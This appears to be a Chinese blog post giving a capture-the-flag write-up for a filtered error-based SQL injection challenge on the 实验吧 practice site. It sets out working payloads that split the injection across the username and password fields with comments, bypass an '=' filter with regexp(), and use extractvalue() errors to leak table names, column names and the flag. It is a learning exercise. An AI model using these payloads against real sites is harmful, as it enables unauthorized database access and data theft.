美文网首页
实验吧 加了料的报错注入

实验吧 加了料的报错注入

作者: DwlufveX | 来源:发表于2019-03-31 13:29 被阅读0次

    加了料的报错注入

    (对https://blog.csdn.net/taozijun/article/details/80400053进行补充)

    嗯这个题直接提示了首先打开hackbar采用post提交

    我们直接试试提交admin  好的不行(那肯定不行啊)

    题目写的很明白报错注入

    这个题肯定是要用sql注入了

    常规的一般不行什么and 1=2啊 这些都会被过滤 并提示 sql injection detected

    参考了别人的wp

    主要有几个关键点

    extractvalue(目标xml文档,xml路径)

    参考这一篇文章

    https://blog.csdn.net/zpy1998zpy/article/details/80631036

    读完之后发现这个题很好理解了

    /**/注释

    ‘or or’这样前后闭合

    (小白有点懵我试着去掉最后一个or’是无法成功注入的

    看到最后有一个单引号想想是为了和前面的’闭合吧

    试着去掉or发现并不成功 我的猜想错了吗? 求教大佬!!

    所以这算是一种套路吗?)

    “=”被过滤采用regexp()的绕过(get到了新姿势)

    参考extractvalue这个函数我们大致可以构造出如下的payload

    后面的爆数据熟悉的不能再熟悉了  往下看 在爆的时候有一个需要注意的地方

    爆数据库得到error_based_hpf

    爆表

    username=admin' or extractvalue/*&password=admin*/(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema regexp database()),'~')) or' 

    (后面的‘’~‘’可以去掉 这里是为了方便查看 但前面的并不可以 因为去掉之后没有语法错误,不会报错这里是参考extractvalue)

    得到表’ffll44jj’

    爆列

    select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj'

    得到列名value

    爆数据

    select group_concat(value) from error_based_hpf.ffll44jj

    得flag

    XPATH syntax error: '~flag{err0r_b4sed_sqli_+_hpf}~'

    相关文章

      网友评论

          本文标题:实验吧 加了料的报错注入

          本文链接:https://www.haomeiwen.com/subject/uowybqtx.html